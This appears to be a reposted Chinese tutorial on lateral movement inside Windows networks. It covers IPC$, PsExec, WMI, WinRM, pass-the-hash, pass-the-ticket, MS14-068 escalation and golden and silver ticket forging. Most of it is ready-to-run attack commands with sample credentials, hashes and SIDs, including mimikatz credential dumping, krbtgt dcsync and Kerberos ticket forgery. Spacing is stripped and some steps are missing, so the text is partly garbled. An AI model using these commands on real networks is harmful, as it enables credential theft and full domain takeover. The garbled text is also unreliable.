本文转载自微信公众号“绕道”,可通过以下二维码关注。转载本文请联系旁路公众号。攻击者借助跳板机进一步侵入内网服务器后,会通过各种手段获取目标系统权限,获取用户的明文密码或哈希值在内网横向移动。最简单的方法是使用明文密码登录远程服务器。在这里,我们总结一下Windows横向移动的思路和攻击方式。1、IPC连接通过验证用户名和密码与目标机建立IPC$会话连接,查看远程主机的共享资源,进行上传/下载,创建计划任务等操作。netuse\\\ipc$"password"/user:"username"2.PsExecPsExec是一个轻量级的telnet替代品,它允许您在其他系统上执行进程并提供具有完全交互性的控制台应用程序,而无需手动安装客户端软件。下载地址:https://docs.microsoft.com/zh-cn/sysinternals/downloads/psexec返回一个交互式shell:psexec.exe\\10.1.1.1-uadministrator-pabc123!cmd.exe同时,它是在Metasploit下还集成了PsExec模块。3.WMIWMI是WindowsManagementSpecification,是用户管理本地和远程计算机的模型。它可以访问、配置、管理和监控几乎所有的Windows资源。远程创建进程:wmic/node:10.1.1.1/user:administrator/password:abc123!processcallcreate"cmd.exe/cipconfig"4.WinRMWinRM指Windows远程管理服务。可以通过远程连接winRM模块来操作windows命令行。默认监听端口为5985(HTTP)&5986(HTTPS),2012年以后默认开启。winrs-r:http://10.1.1.1:5985-u:administrator-p:abc123!"whoami/all"5.通过哈希攻击(Passthehash)获取目标用户的哈希,攻击者可以使用用户的哈希值来冒充用户,获取用户访问权限。MSF提供了Hashtransfer的psexec模块,只使用密码hash执行任意命令:6.传票攻击(Passtheticket)获得域控权限后,可以导出域控内存中的Ticket用于登录域控制器。攻击流程:第一步:使用mimikatz导出内存中的票据mimikatz#sekurlsa::tickets/export第二步:选择一个文件,导入到普通用户的主机上。第三步:获取域控权限7、MS14-068MS14068是一个提权漏洞,普通用户可以将自己的权限提升为域控权限。攻击者可以通过构造特定的请求包来达到提权的目的。前提是需要检查域控主机是否安装了KB3011780补丁。攻击过程:第一步:使用MS14-068伪造生成TGTMS14-068.exe-ubypass@test.com-pabc123!-sS-1-5-21-735015318-3972860336-672499796-ddc.test.com步骤2:使用mimikatz将工具获取的TGTticket写入内存,并创建缓存证书mimikatz#kerberos::ptcTGT_bypass@test.com.ccache第三步:获取权限PsExec.exe\\dccmd.exe8。金票(GoldenTicket)票的原理是利用krbtgt的hash来伪造TGT。只要你有一个高权限的TGT,你就可以将它发送给TGS,以换取任何服务的ST。第一步:获取krbtgt的SID和hash使用mimikatz命令直接获取krbtgt的SID和hash。lsadump::dcsync/domain:test.com/user:krbtgt第二步:伪造金票使用mimikatz伪造TGTkerberos::golden/admin:administrator/domain:test.com/sid:S-1-5-21-735015318-3972860336-672499796/krbtgt:dc717a226a07d0f6adbcd9c0337c6513/ticket:golden.kiribi第3步:获得清除本地票证缓存和导入伪造金票的权限。kerberos::list#查看本地保存的票kerberos::purge#清空本地票缓存kerberos::pttgolden.kiribi#导入假金票kerberos::list#查看本地保存的票第四步:使用假金票直接使用PsExec.exe远程登录并执行命令PsExec.exe\\dccmd.exe9。银票(SilverTickets)银票(SilverTickets)的原理是伪造ST(ServiceTicket),因此无需经过KDC就可以直接使用,对用户账号的hash进行加密,获得指定的访问权限。Forgedtickets只对部分服务有效,可使用的服务如下:第一步:搭建同一域控下的两台主机使用文件共享访问win-server上文件的场景,提示“拒绝访问”.第二步获取NTLMHASH登录win-server服务器,使用mimikatz导出hashmimikatz.exe"privilege::debug""sekurlsa::logonpasswords""exit">log.txt第三步:伪造票据第四步:访问共享文件kerberos::golden/domain:test.com/sid:S-1-5-21-735015318-3972860336-672499796/rc4:943434a10b5134c0b1ef5e8f1ef9b020/user:test/service:cifs/target:win-server.test.com/ptt
